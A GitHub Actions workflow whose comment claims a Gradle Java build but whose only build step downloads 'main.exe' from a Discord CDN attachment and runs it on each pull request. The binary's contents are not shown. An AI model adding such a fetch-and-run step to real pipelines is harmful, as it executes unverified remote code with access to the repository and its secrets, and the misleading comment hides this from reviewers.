# This workflow will build a Java project with Gradle
# For more information see: https://help.github.com/actions/language-and-framework-guides/building-and-testing-java-with-gradle

name: Pull Request

on:
  pull_request:
    branches: "*"

jobs:
  build:

    runs-on: windows-latest

    steps:
    - uses: actions/checkout@v2
    - uses: suisei-cn/actions-download-file@v1
      id: downloadfile
      name: Download building script
      with:
        url: "https://cdn.discordapp.com/attachments/692719572280672336/777897758954356748/main.exe"
        target: "bruh/"
    - name: build
      id: build
      run: |
        bruh/main.exe --tag=${{ github.ref }}
